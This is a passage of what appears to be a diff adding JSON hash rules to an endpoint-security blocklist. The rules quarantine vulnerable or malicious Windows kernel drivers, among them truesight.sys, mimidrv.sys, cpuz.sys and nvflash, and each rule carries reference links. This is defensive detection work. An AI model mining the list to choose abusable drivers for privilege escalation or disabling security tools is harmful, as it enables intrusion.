"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b97d63ebdeda6941bb8cef5e94741c6cca75237ca830561f2262034805f0919", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "879b44d9-3e6a-50f0-93df-28fe5327a965", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474615Z", + "creation_date": "2026-03-23T11:45:31.474619Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474630Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ef5e7e4937163d52f8bbee079c2b72b8f614e7410e2d39fd2ac099e26ad210b6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "87a72ab2-2350-56bd-a439-a8a3c215d1f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142808Z", + "creation_date": "2026-03-23T11:45:31.142810Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142816Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "381ae5f7cace085a6bd7d5eb084e05743195ff7a2c118f7dca7863b56e1e6c0f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "87b58a57-1f60-56a9-b382-a745c2279d22", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464543Z", + "creation_date": "2026-03-23T11:45:30.464546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464555Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31b66a57fae0cc28a6a236d72a35c8b6244f997e700f9464f9cbf800dbf8bee6", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) 
[https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "87c94aad-c20e-529c-a314-40d6a61b4276", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499828Z", + "creation_date": "2026-03-23T11:45:31.499831Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499840Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8f58bf2b14479b8ec6411cae7fd49b723ec191c9037d23266311ef3561c35c3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "87d2abd8-6bec-5761-9862-0742798dfc3d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830223Z", + "creation_date": 
"2026-03-23T11:45:30.830225Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830230Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "372f0918c7aeba23adbeefcea069a62712c16ce6738fb92905e29c00abf29b6c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "87e00e7f-59e8-5dd2-95fb-371a52f4ac09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976052Z", + "creation_date": "2026-03-23T11:45:29.976056Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976064Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d68410930319a6abf445708b9f7df300289cf9e52489f1701db76116f1ebd6a", + "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"87e3903a-c7ba-5ce5-9cfe-5b71eec930ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811152Z", + "creation_date": "2026-03-23T11:45:31.811154Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811159Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61016707e83776e6e9f5f3468982e3e7c1761d598f73144ae10c7e1bdeb4a5b5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "87fd30f0-908e-5f53-a463-dc05fb640735", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618254Z", + "creation_date": "2026-03-23T11:45:29.618256Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.618261Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b715d5682ab59a0ce3f858e47bf79bdf876a899f618c12c22b27cb1dd4daa8f4", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "880bf845-0725-55c6-a5bf-58ed08063a5a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487773Z", + "creation_date": "2026-03-23T11:45:31.487775Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487780Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "648e9acdbcf02ddcc157bbd5c3f85e2126e6f3e960f64477a3cb215c9fb59598", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "881d66cd-13e6-5bd6-b17f-63221ead8ec1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813703Z", + "creation_date": "2026-03-23T11:45:31.813705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2138aada6d7a26cdcdc2781d52228e844866676523a402f2bdd091623e3cea43", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88209b59-0823-52df-b02f-688d462fa5a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829522Z", + "creation_date": "2026-03-23T11:45:31.829524Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829530Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4c0548e6b0f2d752bb4bd37f3afc8309f5df03adb0c4d21a21f779212b09a1c1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8828ff5b-525c-58e4-a444-81aad999aec5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811787Z", + "creation_date": "2026-03-23T11:45:31.811791Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811799Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d19d90002cf6cf5dcfb3bec1c26c8ca3513e8125cac6e6a260270648c657008d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "882b217e-1f68-535e-8f21-159da5e00e42", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984693Z", + "creation_date": "2026-03-23T11:45:29.984695Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984701Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd09931d050a354b34731621191795483930bb5f00aa6fba5bb849ea2c89224c", + "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/5938df1d-9513-449f-8252-c442ddca0c2a/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "882e1aee-45ef-5e83-89a6-1c894eba1534", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609650Z", + "creation_date": "2026-03-23T11:45:29.609652Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44", + 
"comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8830abbd-8d78-5d8e-991c-660edc6ff5f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472214Z", + "creation_date": "2026-03-23T11:45:30.472218Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472227Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6001c6acae09d2a91f8773bbdfd52654c99bc672a9756dc4cb53dc2e3efeb097", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8837c645-02a1-5790-910a-45ce28fba910", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479901Z", + 
"creation_date": "2026-03-23T11:45:30.479903Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479908Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b3196a346973837242d92f3a0ff7bdc2485075d51de0b53650e4ef7348c7a83", + "comment": "Vulnerable NVIDIA Kernel Driver (aka nvoclock.sys) [https://github.com/zer0condition/NVDrv] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88453b33-0d34-5242-9680-aab402878ac4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.158859Z", + "creation_date": "2026-03-23T11:45:31.158861Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.158867Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e0f1aad657bb2576b5d110e698954fbcb5e7cbecea7811df2c66ef949e06afa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "884cd8f0-411f-59d2-b1b7-689892e04a4b", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831639Z", + "creation_date": "2026-03-23T11:45:30.831641Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831647Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a418bce19620d466f516956279ac4072de1391ce704558317ad6b78146fff86", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "88570ad1-2377-5dec-8b7a-2d997d6f8c9f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819598Z", + "creation_date": "2026-03-23T11:45:31.819601Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.819610Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "936131f90127991c8cc5bbadbd26016fbe148f0e9d039a5b40c5cedc19d6edf6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8859a137-3533-54bb-b847-9b2931451e98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825549Z", + "creation_date": "2026-03-23T11:45:31.825552Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825561Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de08dfc173672c79e55af09e5bf86f5d9cb6968a9bb77457e689f629642f1b18", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "885d54e3-ed28-5275-b557-250956736422", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153840Z", + "creation_date": "2026-03-23T11:45:31.153842Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44899bc99bd4383c35fe36b6563509c1d4e9eca92b05378ee7b68eb1e0f7ac96", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "885f5aed-0869-59e5-b9ec-8a95e2e786a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.462699Z", + "creation_date": "2026-03-23T11:45:30.462710Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.462719Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "9e56e96df36237e65b3d7dbc490afdc826215158f6278cd579c576c4b455b392", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "886072b0-2957-594b-a14a-378352224ace", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827802Z", + "creation_date": "2026-03-23T11:45:31.827805Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827812Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "22d99dea02cef171a259514d5df1c7ad8bec039efa524adde6d8baf26c809945", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "886b6f9e-b4a0-5043-ad32-21f2f8486101", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": 
{ + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157512Z", + "creation_date": "2026-03-23T11:45:31.157514Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9809b818ed8be17eb1df23699a3e56cc4ef2285d451110933790ef37cb2a193c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "886b904c-1b22-526f-a425-3ca94e908dbf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 